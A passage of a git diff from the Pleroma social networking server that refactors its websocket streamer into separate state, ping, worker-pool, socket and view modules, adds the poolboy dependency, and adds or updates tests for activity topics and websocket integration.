- alias Pleroma.Web.MastodonAPI.NotificationView
-
- @keepalive_interval :timer.seconds(30)
-
- def start_link(_) do
- GenServer.start_link(__MODULE__, %{}, name: __MODULE__)
- end
-
- def add_socket(topic, socket) do
- GenServer.cast(__MODULE__, %{action: :add, socket: socket, topic: topic})
- end
-
- def remove_socket(topic, socket) do
- GenServer.cast(__MODULE__, %{action: :remove, socket: socket, topic: topic})
- end
-
- def stream(topic, item) do
- GenServer.cast(__MODULE__, %{action: :stream, topic: topic, item: item})
- end
-
- def init(args) do
- Process.send_after(self(), %{action: :ping}, @keepalive_interval)
-
- {:ok, args}
- end
-
- def handle_info(%{action: :ping}, topics) do
- topics
- |> Map.values()
- |> List.flatten()
- |> Enum.each(fn socket ->
- Logger.debug("Sending keepalive ping")
- send(socket.transport_pid, {:text, ""})
- end)
-
- Process.send_after(self(), %{action: :ping}, @keepalive_interval)
-
- {:noreply, topics}
- end
-
- def handle_cast(%{action: :stream, topic: "direct", item: item}, topics) do
- recipient_topics =
- User.get_recipients_from_activity(item)
- |> Enum.map(fn %{id: id} -> "direct:#{id}" end)
-
- Enum.each(recipient_topics || [], fn user_topic ->
- Logger.debug("Trying to push direct message to #{user_topic}\n\n")
- push_to_socket(topics, user_topic, item)
- end)
-
- {:noreply, topics}
- end
-
- def handle_cast(%{action: :stream, topic: "participation", item: participation}, topics) do
- user_topic = "direct:#{participation.user_id}"
- Logger.debug("Trying to push a conversation participation to #{user_topic}\n\n")
-
- push_to_socket(topics, user_topic, participation)
-
- {:noreply, topics}
- end
-
- def handle_cast(%{action: :stream, topic: "list", item: item}, topics) do
- # filter the recipient list if the activity is not public, see #270.
- recipient_lists =
- case Visibility.is_public?(item) do
- true ->
- Pleroma.List.get_lists_from_activity(item)
-
- _ ->
- Pleroma.List.get_lists_from_activity(item)
- |> Enum.filter(fn list ->
- owner = User.get_cached_by_id(list.user_id)
-
- Visibility.visible_for_user?(item, owner)
- end)
- end
-
- recipient_topics =
- recipient_lists
- |> Enum.map(fn %{id: id} -> "list:#{id}" end)
-
- Enum.each(recipient_topics || [], fn list_topic ->
- Logger.debug("Trying to push message to #{list_topic}\n\n")
- push_to_socket(topics, list_topic, item)
- end)
-
- {:noreply, topics}
- end
-
- def handle_cast(
- %{action: :stream, topic: topic, item: %Notification{} = item},
- topics
- )
- when topic in ["user", "user:notification"] do
- topics
- |> Map.get("#{topic}:#{item.user_id}", [])
- |> Enum.each(fn socket ->
- with %User{} = user <- User.get_cached_by_ap_id(socket.assigns[:user].ap_id),
- true <- should_send?(user, item) do
- send(
- socket.transport_pid,
- {:text, represent_notification(socket.assigns[:user], item)}
- )
- end
- end)
-
- {:noreply, topics}
- end
-
- def handle_cast(%{action: :stream, topic: "user", item: item}, topics) do
- Logger.debug("Trying to push to users")
-
- recipient_topics =
- User.get_recipients_from_activity(item)
- |> Enum.map(fn %{id: id} -> "user:#{id}" end)
-
- Enum.each(recipient_topics, fn topic ->
- push_to_socket(topics, topic, item)
- end)
-
- {:noreply, topics}
- end
-
- def handle_cast(%{action: :stream, topic: topic, item: item}, topics) do
- Logger.debug("Trying to push to #{topic}")
- Logger.debug("Pushing item to #{topic}")
- push_to_socket(topics, topic, item)
- {:noreply, topics}
- end
-
- def handle_cast(%{action: :add, topic: topic, socket: socket}, sockets) do
- topic = internal_topic(topic, socket)
- sockets_for_topic = sockets[topic] || []
- sockets_for_topic = Enum.uniq([socket | sockets_for_topic])
- sockets = Map.put(sockets, topic, sockets_for_topic)
- Logger.debug("Got new conn for #{topic}")
- {:noreply, sockets}
- end
-
- def handle_cast(%{action: :remove, topic: topic, socket: socket}, sockets) do
- topic = internal_topic(topic, socket)
- sockets_for_topic = sockets[topic] || []
- sockets_for_topic = List.delete(sockets_for_topic, socket)
- sockets = Map.put(sockets, topic, sockets_for_topic)
- Logger.debug("Removed conn for #{topic}")
- {:noreply, sockets}
- end
-
- def handle_cast(m, state) do
- Logger.info("Unknown: #{inspect(m)}, #{inspect(state)}")
- {:noreply, state}
- end
-
- defp represent_update(%Activity{} = activity, %User{} = user) do
- %{
- event: "update",
- payload:
- Pleroma.Web.MastodonAPI.StatusView.render(
- "status.json",
- activity: activity,
- for: user
- )
- |> Jason.encode!()
- }
- |> Jason.encode!()
- end
-
- defp represent_update(%Activity{} = activity) do
- %{
- event: "update",
- payload:
- Pleroma.Web.MastodonAPI.StatusView.render(
- "status.json",
- activity: activity
- )
- |> Jason.encode!()
- }
- |> Jason.encode!()
- end
-
- def represent_conversation(%Participation{} = participation) do
- %{
- event: "conversation",
- payload:
- Pleroma.Web.MastodonAPI.ConversationView.render("participation.json", %{
- participation: participation,
- for: participation.user
- })
- |> Jason.encode!()
- }
- |> Jason.encode!()
- end
-
- @spec represent_notification(User.t(), Notification.t()) :: binary()
- defp represent_notification(%User{} = user, %Notification{} = notify) do
- %{
- event: "notification",
- payload:
- NotificationView.render(
- "show.json",
- %{notification: notify, for: user}
- )
- |> Jason.encode!()
- }
- |> Jason.encode!()
- end
-
- defp should_send?(%User{} = user, %Activity{} = item) do
- blocks = user.info.blocks || []
- mutes = user.info.mutes || []
- reblog_mutes = user.info.muted_reblogs || []
- domain_blocks = Pleroma.Web.ActivityPub.MRF.subdomains_regex(user.info.domain_blocks)
-
- with parent when not is_nil(parent) <- Object.normalize(item),
- true <- Enum.all?([blocks, mutes, reblog_mutes], &(item.actor not in &1)),
- true <- Enum.all?([blocks, mutes], &(parent.data["actor"] not in &1)),
- %{host: item_host} <- URI.parse(item.actor),
- %{host: parent_host} <- URI.parse(parent.data["actor"]),
- false <- Pleroma.Web.ActivityPub.MRF.subdomain_match?(domain_blocks, item_host),
- false <- Pleroma.Web.ActivityPub.MRF.subdomain_match?(domain_blocks, parent_host),
- true <- thread_containment(item, user),
- false <- CommonAPI.thread_muted?(user, item) do
- true
- else
- _ -> false
- end
- end
-
- defp should_send?(%User{} = user, %Notification{activity: activity}) do
- should_send?(user, activity)
- end
-
- def push_to_socket(topics, topic, %Activity{data: %{"type" => "Announce"}} = item) do
- Enum.each(topics[topic] || [], fn socket ->
- # Get the current user so we have up-to-date blocks etc.
- if socket.assigns[:user] do
- user = User.get_cached_by_ap_id(socket.assigns[:user].ap_id)
-
- if should_send?(user, item) do
- send(socket.transport_pid, {:text, represent_update(item, user)})
- end
- else
- send(socket.transport_pid, {:text, represent_update(item)})
- end
- end)
- end
-
- def push_to_socket(topics, topic, %Participation{} = participation) do
- Enum.each(topics[topic] || [], fn socket ->
- send(socket.transport_pid, {:text, represent_conversation(participation)})
- end)
- end
-
- def push_to_socket(topics, topic, %Activity{
- data: %{"type" => "Delete", "deleted_activity_id" => deleted_activity_id}
- }) do
- Enum.each(topics[topic] || [], fn socket ->
- send(
- socket.transport_pid,
- {:text, %{event: "delete", payload: to_string(deleted_activity_id)} |> Jason.encode!()}
- )
- end)
- end
-
- def push_to_socket(_topics, _topic, %Activity{data: %{"type" => "Delete"}}), do: :noop
-
- def push_to_socket(topics, topic, item) do
- Enum.each(topics[topic] || [], fn socket ->
- # Get the current user so we have up-to-date blocks etc.
- if socket.assigns[:user] do
- user = User.get_cached_by_ap_id(socket.assigns[:user].ap_id)
- blocks = user.info.blocks || []
- mutes = user.info.mutes || []
-
- with true <- Enum.all?([blocks, mutes], &(item.actor not in &1)),
- true <- thread_containment(item, user) do
- send(socket.transport_pid, {:text, represent_update(item, user)})
- end
- else
- send(socket.transport_pid, {:text, represent_update(item)})
- end
- end)
- end
-
- defp internal_topic(topic, socket) when topic in ~w[user user:notification direct] do
- "#{topic}:#{socket.assigns[:user].id}"
- end
-
- defp internal_topic(topic, _), do: topic
-
- @spec thread_containment(Activity.t(), User.t()) :: boolean()
- defp thread_containment(_activity, %User{info: %{skip_thread_containment: true}}), do: true
-
- defp thread_containment(activity, user) do
- if Config.get([:instance, :skip_thread_containment]) do
- true
- else
- ActivityPub.contain_activity(activity, user)
- end
- end
-end
diff --git a/lib/pleroma/web/streamer/ping.ex b/lib/pleroma/web/streamer/ping.ex
new file mode 100644
index 000000000..f77cbb95c
--- /dev/null
+++ b/lib/pleroma/web/streamer/ping.ex
@@ -0,0 +1,33 @@
+defmodule Pleroma.Web.Streamer.Ping do
+ use GenServer
+ require Logger
+
+ alias Pleroma.Web.Streamer.State
+ alias Pleroma.Web.Streamer.StreamerSocket
+
+ @keepalive_interval :timer.seconds(30)
+
+ def start_link(opts) do
+ ping_interval = Keyword.get(opts, :ping_interval, @keepalive_interval)
+ GenServer.start_link(__MODULE__, %{ping_interval: ping_interval}, name: __MODULE__)
+ end
+
+ def init(%{ping_interval: ping_interval} = args) do
+ Process.send_after(self(), :ping, ping_interval)
+ {:ok, args}
+ end
+
+ def handle_info(:ping, %{ping_interval: ping_interval} = state) do
+ State.get_sockets()
+ |> Map.values()
+ |> List.flatten()
+ |> Enum.each(fn %StreamerSocket{transport_pid: transport_pid} ->
+ Logger.debug("Sending keepalive ping")
+ send(transport_pid, {:text, ""})
+ end)
+
+ Process.send_after(self(), :ping, ping_interval)
+
+ {:noreply, state}
+ end
+end
diff --git a/lib/pleroma/web/streamer/state.ex b/lib/pleroma/web/streamer/state.ex
new file mode 100644
index 000000000..7b5199068
--- /dev/null
+++ b/lib/pleroma/web/streamer/state.ex
@@ -0,0 +1,68 @@
+defmodule Pleroma.Web.Streamer.State do
+ use GenServer
+ require Logger
+
+ alias Pleroma.Web.Streamer.StreamerSocket
+
+ def start_link(_) do
+ GenServer.start_link(__MODULE__, %{sockets: %{}}, name: __MODULE__)
+ end
+
+ def add_socket(topic, socket) do
+ GenServer.call(__MODULE__, {:add, socket, topic})
+ end
+
+ def remove_socket(topic, socket) do
+ GenServer.call(__MODULE__, {:remove, socket, topic})
+ end
+
+ def get_sockets do
+ %{sockets: stream_sockets} = GenServer.call(__MODULE__, :get_state)
+ stream_sockets
+ end
+
+ def init(init_arg) do
+ {:ok, init_arg}
+ end
+
+ def handle_call(:get_state, _from, state) do
+ {:reply, state, state}
+ end
+
+ def handle_call({:add, socket, topic}, _from, %{sockets: sockets} = state) do
+ internal_topic = internal_topic(topic, socket)
+ stream_socket = StreamerSocket.from_socket(socket)
+
+ sockets_for_topic =
+ sockets
+ |> Map.get(internal_topic, [])
+ |> List.insert_at(0, stream_socket)
+ |> Enum.uniq()
+
+ state = put_in(state, [:sockets, internal_topic], sockets_for_topic)
+ Logger.debug("Got new conn for #{topic}")
+ {:reply, state, state}
+ end
+
+ def handle_call({:remove, socket, topic}, _from, %{sockets: sockets} = state) do
+ internal_topic = internal_topic(topic, socket)
+ stream_socket = StreamerSocket.from_socket(socket)
+
+ sockets_for_topic =
+ sockets
+ |> Map.get(internal_topic, [])
+ |> List.delete(stream_socket)
+
+ state = Kernel.put_in(state, [:sockets, internal_topic], sockets_for_topic)
+ {:reply, state, state}
+ end
+
+ defp internal_topic(topic, socket)
+ when topic in ~w[user user:notification direct] do
+ "#{topic}:#{socket.assigns[:user].id}"
+ end
+
+ defp internal_topic(topic, _) do
+ topic
+ end
+end
diff --git a/lib/pleroma/web/streamer/streamer.ex b/lib/pleroma/web/streamer/streamer.ex
new file mode 100644
index 000000000..8cf719277
--- /dev/null
+++ b/lib/pleroma/web/streamer/streamer.ex
@@ -0,0 +1,55 @@
+# Pleroma: A lightweight social networking server
+# Copyright © 2017-2019 Pleroma Authors
+# SPDX-License-Identifier: AGPL-3.0-only
+
+defmodule Pleroma.Web.Streamer do
+ alias Pleroma.Web.Streamer.State
+ alias Pleroma.Web.Streamer.Worker
+
+ @timeout 60_000
+ @mix_env Mix.env()
+
+ def add_socket(topic, socket) do
+ State.add_socket(topic, socket)
+ end
+
+ def remove_socket(topic, socket) do
+ State.remove_socket(topic, socket)
+ end
+
+ def get_sockets do
+ State.get_sockets()
+ end
+
+ def stream(topics, items) do
+ if should_send?() do
+ Task.async(fn ->
+ :poolboy.transaction(
+ :streamer_worker,
+ &Worker.stream(&1, topics, items),
+ @timeout
+ )
+ end)
+ end
+ end
+
+ def supervisor, do: Pleroma.Web.Streamer.Supervisor
+
+ defp should_send? do
+ handle_should_send(@mix_env)
+ end
+
+ defp handle_should_send(:test) do
+ case Process.whereis(:streamer_worker) do
+ nil ->
+ false
+
+ pid ->
+ Process.alive?(pid)
+ end
+ end
+
+ defp handle_should_send(_) do
+ true
+ end
+end
diff --git a/lib/pleroma/web/streamer/streamer_socket.ex b/lib/pleroma/web/streamer/streamer_socket.ex
new file mode 100644
index 000000000..f006c0306
--- /dev/null
+++ b/lib/pleroma/web/streamer/streamer_socket.ex
@@ -0,0 +1,31 @@
+defmodule Pleroma.Web.Streamer.StreamerSocket do
+ defstruct transport_pid: nil, user: nil
+
+ alias Pleroma.User
+ alias Pleroma.Web.Streamer.StreamerSocket
+
+ def from_socket(%{
+ transport_pid: transport_pid,
+ assigns: %{user: nil}
+ }) do
+ %StreamerSocket{
+ transport_pid: transport_pid
+ }
+ end
+
+ def from_socket(%{
+ transport_pid: transport_pid,
+ assigns: %{user: %User{} = user}
+ }) do
+ %StreamerSocket{
+ transport_pid: transport_pid,
+ user: user
+ }
+ end
+
+ def from_socket(%{transport_pid: transport_pid}) do
+ %StreamerSocket{
+ transport_pid: transport_pid
+ }
+ end
+end
diff --git a/lib/pleroma/web/streamer/supervisor.ex b/lib/pleroma/web/streamer/supervisor.ex
new file mode 100644
index 000000000..6afe19323
--- /dev/null
+++ b/lib/pleroma/web/streamer/supervisor.ex
@@ -0,0 +1,33 @@
+defmodule Pleroma.Web.Streamer.Supervisor do
+ use Supervisor
+
+ def start_link(opts) do
+ Supervisor.start_link(__MODULE__, opts, name: __MODULE__)
+ end
+
+ def init(args) do
+ children = [
+ {Pleroma.Web.Streamer.State, args},
+ {Pleroma.Web.Streamer.Ping, args},
+ :poolboy.child_spec(:streamer_worker, poolboy_config())
+ ]
+
+ opts = [strategy: :one_for_one, name: Pleroma.Web.Streamer.Supervisor]
+ Supervisor.init(children, opts)
+ end
+
+ defp poolboy_config do
+ opts =
+ Pleroma.Config.get(:streamer,
+ workers: 3,
+ overflow_workers: 2
+ )
+
+ [
+ {:name, {:local, :streamer_worker}},
+ {:worker_module, Pleroma.Web.Streamer.Worker},
+ {:size, opts[:workers]},
+ {:max_overflow, opts[:overflow_workers]}
+ ]
+ end
+end
diff --git a/lib/pleroma/web/streamer/worker.ex b/lib/pleroma/web/streamer/worker.ex
new file mode 100644
index 000000000..5804508eb
--- /dev/null
+++ b/lib/pleroma/web/streamer/worker.ex
@@ -0,0 +1,220 @@
+defmodule Pleroma.Web.Streamer.Worker do
+ use GenServer
+
+ require Logger
+
+ alias Pleroma.Activity
+ alias Pleroma.Config
+ alias Pleroma.Conversation.Participation
+ alias Pleroma.Notification
+ alias Pleroma.Object
+ alias Pleroma.User
+ alias Pleroma.Web.ActivityPub.ActivityPub
+ alias Pleroma.Web.ActivityPub.Visibility
+ alias Pleroma.Web.CommonAPI
+ alias Pleroma.Web.Streamer.State
+ alias Pleroma.Web.Streamer.StreamerSocket
+ alias Pleroma.Web.StreamerView
+
+ def start_link(_) do
+ GenServer.start_link(__MODULE__, %{}, [])
+ end
+
+ def init(init_arg) do
+ {:ok, init_arg}
+ end
+
+ def stream(pid, topics, items) do
+ GenServer.call(pid, {:stream, topics, items})
+ end
+
+ def handle_call({:stream, topics, item}, _from, state) when is_list(topics) do
+ Enum.each(topics, fn t ->
+ do_stream(%{topic: t, item: item})
+ end)
+
+ {:reply, state, state}
+ end
+
+ def handle_call({:stream, topic, items}, _from, state) when is_list(items) do
+ Enum.each(items, fn i ->
+ do_stream(%{topic: topic, item: i})
+ end)
+
+ {:reply, state, state}
+ end
+
+ def handle_call({:stream, topic, item}, _from, state) do
+ do_stream(%{topic: topic, item: item})
+
+ {:reply, state, state}
+ end
+
+ defp do_stream(%{topic: "direct", item: item}) do
+ recipient_topics =
+ User.get_recipients_from_activity(item)
+ |> Enum.map(fn %{id: id} -> "direct:#{id}" end)
+
+ Enum.each(recipient_topics, fn user_topic ->
+ Logger.debug("Trying to push direct message to #{user_topic}\n\n")
+ push_to_socket(State.get_sockets(), user_topic, item)
+ end)
+ end
+
+ defp do_stream(%{topic: "participation", item: participation}) do
+ user_topic = "direct:#{participation.user_id}"
+ Logger.debug("Trying to push a conversation participation to #{user_topic}\n\n")
+
+ push_to_socket(State.get_sockets(), user_topic, participation)
+ end
+
+ defp do_stream(%{topic: "list", item: item}) do
+ # filter the recipient list if the activity is not public, see #270.
+ recipient_lists =
+ case Visibility.is_public?(item) do
+ true ->
+ Pleroma.List.get_lists_from_activity(item)
+
+ _ ->
+ Pleroma.List.get_lists_from_activity(item)
+ |> Enum.filter(fn list ->
+ owner = User.get_cached_by_id(list.user_id)
+
+ Visibility.visible_for_user?(item, owner)
+ end)
+ end
+
+ recipient_topics =
+ recipient_lists
+ |> Enum.map(fn %{id: id} -> "list:#{id}" end)
+
+ Enum.each(recipient_topics, fn list_topic ->
+ Logger.debug("Trying to push message to #{list_topic}\n\n")
+ push_to_socket(State.get_sockets(), list_topic, item)
+ end)
+ end
+
+ defp do_stream(%{topic: topic, item: %Notification{} = item})
+ when topic in ["user", "user:notification"] do
+ State.get_sockets()
+ |> Map.get("#{topic}:#{item.user_id}", [])
+ |> Enum.each(fn %StreamerSocket{transport_pid: transport_pid, user: socket_user} ->
+ with %User{} = user <- User.get_cached_by_ap_id(socket_user.ap_id),
+ true <- should_send?(user, item) do
+ send(transport_pid, {:text, StreamerView.render("notification.json", socket_user, item)})
+ end
+ end)
+ end
+
+ defp do_stream(%{topic: "user", item: item}) do
+ Logger.debug("Trying to push to users")
+
+ recipient_topics =
+ User.get_recipients_from_activity(item)
+ |> Enum.map(fn %{id: id} -> "user:#{id}" end)
+
+ Enum.each(recipient_topics, fn topic ->
+ push_to_socket(State.get_sockets(), topic, item)
+ end)
+ end
+
+ defp do_stream(%{topic: topic, item: item}) do
+ Logger.debug("Trying to push to #{topic}")
+ Logger.debug("Pushing item to #{topic}")
+ push_to_socket(State.get_sockets(), topic, item)
+ end
+
+ defp should_send?(%User{} = user, %Activity{} = item) do
+ blocks = user.info.blocks || []
+ mutes = user.info.mutes || []
+ reblog_mutes = user.info.muted_reblogs || []
+ domain_blocks = Pleroma.Web.ActivityPub.MRF.subdomains_regex(user.info.domain_blocks)
+
+ with parent when not is_nil(parent) <- Object.normalize(item),
+ true <- Enum.all?([blocks, mutes, reblog_mutes], &(item.actor not in &1)),
+ true <- Enum.all?([blocks, mutes], &(parent.data["actor"] not in &1)),
+ %{host: item_host} <- URI.parse(item.actor),
+ %{host: parent_host} <- URI.parse(parent.data["actor"]),
+ false <- Pleroma.Web.ActivityPub.MRF.subdomain_match?(domain_blocks, item_host),
+ false <- Pleroma.Web.ActivityPub.MRF.subdomain_match?(domain_blocks, parent_host),
+ true <- thread_containment(item, user),
+ false <- CommonAPI.thread_muted?(user, item) do
+ true
+ else
+ _ -> false
+ end
+ end
+
+ defp should_send?(%User{} = user, %Notification{activity: activity}) do
+ should_send?(user, activity)
+ end
+
+ def push_to_socket(topics, topic, %Activity{data: %{"type" => "Announce"}} = item) do
+ Enum.each(topics[topic] || [], fn %StreamerSocket{
+ transport_pid: transport_pid,
+ user: socket_user
+ } ->
+ # Get the current user so we have up-to-date blocks etc.
+ if socket_user do
+ user = User.get_cached_by_ap_id(socket_user.ap_id)
+
+ if should_send?(user, item) do
+ send(transport_pid, {:text, StreamerView.render("update.json", item, user)})
+ end
+ else
+ send(transport_pid, {:text, StreamerView.render("update.json", item)})
+ end
+ end)
+ end
+
+ def push_to_socket(topics, topic, %Participation{} = participation) do
+ Enum.each(topics[topic] || [], fn %StreamerSocket{transport_pid: transport_pid} ->
+ send(transport_pid, {:text, StreamerView.render("conversation.json", participation)})
+ end)
+ end
+
+ def push_to_socket(topics, topic, %Activity{
+ data: %{"type" => "Delete", "deleted_activity_id" => deleted_activity_id}
+ }) do
+ Enum.each(topics[topic] || [], fn %StreamerSocket{transport_pid: transport_pid} ->
+ send(
+ transport_pid,
+ {:text, %{event: "delete", payload: to_string(deleted_activity_id)} |> Jason.encode!()}
+ )
+ end)
+ end
+
+ def push_to_socket(_topics, _topic, %Activity{data: %{"type" => "Delete"}}), do: :noop
+
+ def push_to_socket(topics, topic, item) do
+ Enum.each(topics[topic] || [], fn %StreamerSocket{
+ transport_pid: transport_pid,
+ user: socket_user
+ } ->
+ # Get the current user so we have up-to-date blocks etc.
+ if socket_user do
+ user = User.get_cached_by_ap_id(socket_user.ap_id)
+ blocks = user.info.blocks || []
+ mutes = user.info.mutes || []
+
+ with true <- Enum.all?([blocks, mutes], &(item.actor not in &1)),
+ true <- thread_containment(item, user) do
+ send(transport_pid, {:text, StreamerView.render("update.json", item, user)})
+ end
+ else
+ send(transport_pid, {:text, StreamerView.render("update.json", item)})
+ end
+ end)
+ end
+
+ @spec thread_containment(Activity.t(), User.t()) :: boolean()
+ defp thread_containment(_activity, %User{info: %{skip_thread_containment: true}}), do: true
+
+ defp thread_containment(activity, user) do
+ if Config.get([:instance, :skip_thread_containment]) do
+ true
+ else
+ ActivityPub.contain_activity(activity, user)
+ end
+ end
+end
diff --git a/lib/pleroma/web/views/streamer_view.ex b/lib/pleroma/web/views/streamer_view.ex
new file mode 100644
index 000000000..b13030fa0
--- /dev/null
+++ b/lib/pleroma/web/views/streamer_view.ex
@@ -0,0 +1,66 @@
+# Pleroma: A lightweight social networking server
+# Copyright © 2017-2019 Pleroma Authors
+# SPDX-License-Identifier: AGPL-3.0-only
+
+defmodule Pleroma.Web.StreamerView do
+ use Pleroma.Web, :view
+
+ alias Pleroma.Activity
+ alias Pleroma.Conversation.Participation
+ alias Pleroma.Notification
+ alias Pleroma.User
+ alias Pleroma.Web.MastodonAPI.NotificationView
+
+ def render("update.json", %Activity{} = activity, %User{} = user) do
+ %{
+ event: "update",
+ payload:
+ Pleroma.Web.MastodonAPI.StatusView.render(
+ "status.json",
+ activity: activity,
+ for: user
+ )
+ |> Jason.encode!()
+ }
+ |> Jason.encode!()
+ end
+
+ def render("notification.json", %User{} = user, %Notification{} = notify) do
+ %{
+ event: "notification",
+ payload:
+ NotificationView.render(
+ "show.json",
+ %{notification: notify, for: user}
+ )
+ |> Jason.encode!()
+ }
+ |> Jason.encode!()
+ end
+
+ def render("update.json", %Activity{} = activity) do
+ %{
+ event: "update",
+ payload:
+ Pleroma.Web.MastodonAPI.StatusView.render(
+ "status.json",
+ activity: activity
+ )
+ |> Jason.encode!()
+ }
+ |> Jason.encode!()
+ end
+
+ def render("conversation.json", %Participation{} = participation) do
+ %{
+ event: "conversation",
+ payload:
+ Pleroma.Web.MastodonAPI.ConversationView.render("participation.json", %{
+ participation: participation,
+ for: participation.user
+ })
+ |> Jason.encode!()
+ }
+ |> Jason.encode!()
+ end
+end
diff --git a/mix.exs b/mix.exs
index f1e98585b..911ebad1d 100644
--- a/mix.exs
+++ b/mix.exs
@@ -144,6 +144,7 @@ defp deps do
git: "https://git.pleroma.social/pleroma/http_signatures.git",
ref: "293d77bb6f4a67ac8bde1428735c3b42f22cbb30"},
{:telemetry, "~> 0.3"},
+ {:poolboy, "~> 1.5"},
{:prometheus_ex, "~> 3.0"},
{:prometheus_plugs, "~> 1.1"},
{:prometheus_phoenix, "~> 1.3"},
diff --git a/mix.lock b/mix.lock
index 41697dd5c..0bf6a811e 100644
--- a/mix.lock
+++ b/mix.lock
@@ -73,6 +73,7 @@
"plug_crypto": {:hex, :plug_crypto, "1.0.0", "18e49317d3fa343f24620ed22795ec29d4a5e602d52d1513ccea0b07d8ea7d4d", [:mix], [], "hexpm"},
"plug_static_index_html": {:hex, :plug_static_index_html, "1.0.0", "840123d4d3975585133485ea86af73cb2600afd7f2a976f9f5fd8b3808e636a0", [:mix], [{:plug, "~> 1.0", [hex: :plug, repo: "hexpm", optional: false]}], "hexpm"},
"poison": {:hex, :poison, "3.1.0", "d9eb636610e096f86f25d9a46f35a9facac35609a7591b3be3326e99a0484665", [:mix], [], "hexpm"},
+ "poolboy": {:hex, :poolboy, "1.5.2", "392b007a1693a64540cead79830443abf5762f5d30cf50bc95cb2c1aaafa006b", [:rebar3], [], "hexpm"},
"postgrex": {:hex, :postgrex, "0.14.3", "5754dee2fdf6e9e508cbf49ab138df964278700b764177e8f3871e658b345a1e", [:mix], [{:connection, "~> 1.0", [hex: :connection, repo: "hexpm", optional: false]}, {:db_connection, "~> 2.0", [hex: :db_connection, repo: "hexpm", optional: false]}, {:decimal, "~> 1.5", [hex: :decimal, repo: "hexpm", optional: false]}, {:jason, "~> 1.0", [hex: :jason, repo: "hexpm", optional: true]}], "hexpm"},
"prometheus": {:hex, :prometheus, "4.4.1", "1e96073b3ed7788053768fea779cbc896ddc3bdd9ba60687f2ad50b252ac87d6", [:mix, :rebar3], [], "hexpm"},
"prometheus_ecto": {:hex, :prometheus_ecto, "1.4.1", "6c768ea9654de871e5b32fab2eac348467b3021604ebebbcbd8bcbe806a65ed5", [:mix], [{:ecto, "~> 2.0 or ~> 3.0", [hex: :ecto, repo: "hexpm", optional: false]}, {:prometheus_ex, "~> 1.1 or ~> 2.0 or ~> 3.0", [hex: :prometheus_ex, repo: "hexpm", optional: false]}], "hexpm"},
diff --git a/test/activity/ir/topics_test.exs b/test/activity/ir/topics_test.exs
new file mode 100644
index 000000000..e75f83586
--- /dev/null
+++ b/test/activity/ir/topics_test.exs
@@ -0,0 +1,141 @@
+defmodule Pleroma.Activity.Ir.TopicsTest do
+ use Pleroma.DataCase
+
+ alias Pleroma.Activity
+ alias Pleroma.Activity.Ir.Topics
+ alias Pleroma.Object
+
+ require Pleroma.Constants
+
+ describe "poll answer" do
+ test "produce no topics" do
+ activity = %Activity{object: %Object{data: %{"type" => "Answer"}}}
+
+ assert [] == Topics.get_activity_topics(activity)
+ end
+ end
+
+ describe "non poll answer" do
+ test "always add user and list topics" do
+ activity = %Activity{object: %Object{data: %{"type" => "FooBar"}}}
+ topics = Topics.get_activity_topics(activity)
+
+ assert Enum.member?(topics, "user")
+ assert Enum.member?(topics, "list")
+ end
+ end
+
+ describe "public visibility" do
+ setup do
+ activity = %Activity{
+ object: %Object{data: %{"type" => "Note"}},
+ data: %{"to" => [Pleroma.Constants.as_public()]}
+ }
+
+ {:ok, activity: activity}
+ end
+
+ test "produces public topic", %{activity: activity} do
+ topics = Topics.get_activity_topics(activity)
+
+ assert Enum.member?(topics, "public")
+ end
+
+ test "local action produces public:local topic", %{activity: activity} do
+ activity = %{activity | local: true}
+ topics = Topics.get_activity_topics(activity)
+
+ assert Enum.member?(topics, "public:local")
+ end
+
+ test "non-local action does not produce public:local topic", %{activity: activity} do
+ activity = %{activity | local: false}
+ topics = Topics.get_activity_topics(activity)
+
+ refute Enum.member?(topics, "public:local")
+ end
+ end
+
+ describe "public visibility create events" do
+ setup do
+ activity = %Activity{
+ object: %Object{data: %{"type" => "Create", "attachment" => []}},
+ data: %{"to" => [Pleroma.Constants.as_public()]}
+ }
+
+ {:ok, activity: activity}
+ end
+
+ test "with no attachments doesn't produce public:media topics", %{activity: activity} do
+ topics = Topics.get_activity_topics(activity)
+
+ refute Enum.member?(topics, "public:media")
+ refute Enum.member?(topics, "public:local:media")
+ end
+
+ test "converts tags to hash tags", %{activity: %{object: %{data: data} = object} = activity} do
+ tagged_data = Map.put(data, "tag", ["foo", "bar"])
+ activity = %{activity | object: %{object | data: tagged_data}}
+
+ topics = Topics.get_activity_topics(activity)
+
+ assert Enum.member?(topics, "hashtag:foo")
+ assert Enum.member?(topics, "hashtag:bar")
+ end
+
+ test "only converts strinngs to hash tags", %{
+ activity: %{object: %{data: data} = object} = activity
+ } do
+ tagged_data = Map.put(data, "tag", [2])
+ activity = %{activity | object: %{object | data: tagged_data}}
+
+ topics = Topics.get_activity_topics(activity)
+
+ refute Enum.member?(topics, "hashtag:2")
+ end
+ end
+
+ describe "public visibility create events with attachments" do
+ setup do
+ activity = %Activity{
+ object: %Object{data: %{"type" => "Create", "attachment" => ["foo"]}},
+ data: %{"to" => [Pleroma.Constants.as_public()]}
+ }
+
+ {:ok, activity: activity}
+ end
+
+ test "produce public:media topics", %{activity: activity} do
+ topics = Topics.get_activity_topics(activity)
+
+ assert Enum.member?(topics, "public:media")
+ end
+
+ test "local produces public:local:media topics", %{activity: activity} do
+ topics = Topics.get_activity_topics(activity)
+
+ assert Enum.member?(topics, "public:local:media")
+ end
+
+ test "non-local doesn't produce public:local:media topics", %{activity: activity} do
+ activity = %{activity | local: false}
+
+ topics = Topics.get_activity_topics(activity)
+
+ refute Enum.member?(topics, "public:local:media")
+ end
+ end
+
+ describe "non-public visibility" do
+ test "produces direct topic" do
+ activity = %Activity{object: %Object{data: %{"type" => "Note"}}, data: %{"to" => []}}
+ topics = Topics.get_activity_topics(activity)
+
+ assert Enum.member?(topics, "direct")
+ refute Enum.member?(topics, "public")
+ refute Enum.member?(topics, "public:local")
+ refute Enum.member?(topics, "public:media")
+ refute Enum.member?(topics, "public:local:media")
+ end
+ end
+end
diff --git a/test/integration/mastodon_websocket_test.exs b/test/integration/mastodon_websocket_test.exs
index 63bf73412..c04262808 100644
--- a/test/integration/mastodon_websocket_test.exs
+++ b/test/integration/mastodon_websocket_test.exs
@@ -11,7 +11,6 @@ defmodule Pleroma.Integration.MastodonWebsocketTest do
alias Pleroma.Integration.WebsocketClient
alias Pleroma.Web.CommonAPI
alias Pleroma.Web.OAuth
- alias Pleroma.Web.Streamer
@path Pleroma.Web.Endpoint.url()
|> URI.parse()
@@ -19,16 +18,6 @@ defmodule Pleroma.Integration.MastodonWebsocketTest do
|> Map.put(:path, "/api/v1/streaming")
|> URI.to_string()
- setup do
- GenServer.start(Streamer, %{}, name: Streamer)
-
- on_exit(fn ->
